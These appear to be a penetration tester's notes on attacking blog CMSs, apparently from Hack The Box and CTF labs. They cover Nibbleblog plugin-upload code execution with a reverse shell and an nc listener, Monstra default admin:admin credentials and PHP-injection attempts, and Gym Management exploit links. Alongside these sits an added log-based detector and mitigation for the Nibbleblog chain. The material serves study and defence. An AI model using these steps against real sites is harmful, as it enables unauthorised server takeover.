# Blogs

## Priority

* Extends > Themes "Helloworld" > Save
* System > Backup > Content > Files > Save something
* System > Settings > Maintenance Mode > `<?php phpinfo(); ?>` > Save
* Plugins are often exploitable
* searchsploit
* GitHub "Issues"

## REF

* [DirbNiktoWP](/02-scanning/02-dirb-masscan-pings.md) - also has a webapp/CMS scanner section

## Nibbleblog

* <https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html>
* Obtain admin credentials, then activate the "My image" plugin by visiting:
* <http://localhost/nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image>
* Upload a PHP shell through the plugin (ignore the warnings), then visit:
* <http://localhost/nibbleblog/content/private/plugins/my_image/image.php>
* No matter what you name the PHP upload, it will always be saved as `image.php` after uploading.

```
Setup reverse.php
Upload: "reverse.php" with my IP

Execute:
http://10.129.1.135/nibbleblog/content/private/plugins/my_image/image.php

nc -nvlp 4444
Connected!
```
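The two URLs in the Nibbleblog notes above are stable indicators on the defensive side: the plugin-install request to `admin.php` and, because the uploaded file is always written as `image.php`, any request to `content/private/plugins/my_image/image.php`. The script below is an added example (not from the page or the Nibbleblog project) that runs that detection over constructed access-log lines and rates a client as `high` when the same IP both installed the plugin and then requested `image.php`. The log format, sample IPs and indicator names are assumptions for the example.

```python
"""Flag the Nibbleblog 'My image' plugin abuse chain in web server access logs.

Indicators are taken from the notes above: the plugin-install URL
(admin.php?controller=plugins&action=install&plugin=my_image) and the
fixed name of the uploaded file (content/private/plugins/my_image/image.php).
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx combined-style access log; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Indicator names are an assumption of this example, not Nibbleblog terms.
PLUGIN_INSTALL = "nibbleblog_my_image_install"
IMAGE_PHP_HIT = "nibbleblog_my_image_image_php"

# Constructed sample log (RFC 5737 client addresses), not real traffic.
SAMPLE_LOG = """\
192.0.2.20 - - [12/May/2021:10:01:02 +0000] "GET /nibbleblog/index.php HTTP/1.1" 200 5123
198.51.100.23 - - [12/May/2021:10:02:10 +0000] "GET /nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image HTTP/1.1" 200 2210
198.51.100.23 - - [12/May/2021:10:03:50 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1" 200 0
203.0.113.7 - - [12/May/2021:10:05:00 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1" 404 210
192.0.2.20 - - [12/May/2021:10:06:00 +0000] "GET /nibbleblog/content/public/upload/photo.jpg HTTP/1.1" 200 8000
"""


def classify(line: str):
    """Return (indicator, ip, timestamp, status) for a matching line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    path = url.path.lower()
    qs = parse_qs(url.query)
    if (path.endswith("/admin.php")
            and qs.get("controller") == ["plugins"]
            and qs.get("action") == ["install"]
            and qs.get("plugin") == ["my_image"]):
        return (PLUGIN_INSTALL, m["ip"], m["ts"], int(m["status"]))
    if path.endswith("/content/private/plugins/my_image/image.php"):
        return (IMAGE_PHP_HIT, m["ip"], m["ts"], int(m["status"]))
    return None


def analyze(log_text: str) -> dict:
    """Group indicators by client IP and rate each client.

    'high'   : the same IP installed the plugin and then requested image.php
               (the full upload-then-execute chain from the notes).
    'medium' : only one of the two indicators was seen (e.g. a scanner
               probing for image.php, or an install with no follow-up).
    """
    per_ip = {}
    for line in log_text.splitlines():
        hit = classify(line)
        if hit is None:
            continue
        indicator, ip, ts, status = hit
        per_ip.setdefault(ip, []).append((indicator, ts, status))

    report = {}
    for ip, events in per_ip.items():
        kinds = {e[0] for e in events}
        severity = "high" if {PLUGIN_INSTALL, IMAGE_PHP_HIT} <= kinds else "medium"
        report[ip] = {"severity": severity, "events": events}
    return report


if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        print(ip, info["severity"])
        for indicator, ts, status in info["events"]:
            print("   ", ts, indicator, status)
```

The `status` is kept in each event because a `404` on `image.php` (as for the second client in the sample) usually means a probe against a site where nothing was uploaded, while a `200` after an install request means the file exists and was served. Beyond detection, the obvious mitigation is to serve the plugin upload directory without PHP execution so that a file named `image.php` under `content/private/` is never run.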

## Monstra

* TartarHTB

```
Monstra
https://$IP/webservices/monstra-3.0.4/
https://$IP/webservices/monstra-3.0.4/admin/

admin:admin  ..default works!

Try to edit themes! 
They are often php

Monstra > Extends > Themes
"Helloworld" > Save ..fails

System > Backup ..not created (not writeable)
Content > Files ..new directory (created)
Content > Files > File ..Fails

System > Settings > Maintenance Mode
<?php phpinfo(); ?>   ..Save Fails
Hello                 ..Save Fails

-----------------------
searchsploit monstra
github monstra > Issues > php code execution
Look for SQLi or LFI
```

## Gym Management

REF: Redteam CTF Defcon\
Pivonka found this vuln on his own!\
Actually a public/known exploit

* <https://www.exploit-db.com/exploits/48506>
* <https://github.com/ratik92/gymmanagementsystem>
* <https://github.com/fakhrizulkifli/Defeating-PHP-GD-imagecreatefromjpeg>
* <https://medium.com/@asdqwedev/remote-image-upload-leads-to-rce-inject-malicious-code-to-php-gd-image-90e1e8b2aada>
* <https://gist.github.com/asdqwe3124/e63eba35dc8e6976af97f1a9348b277b>
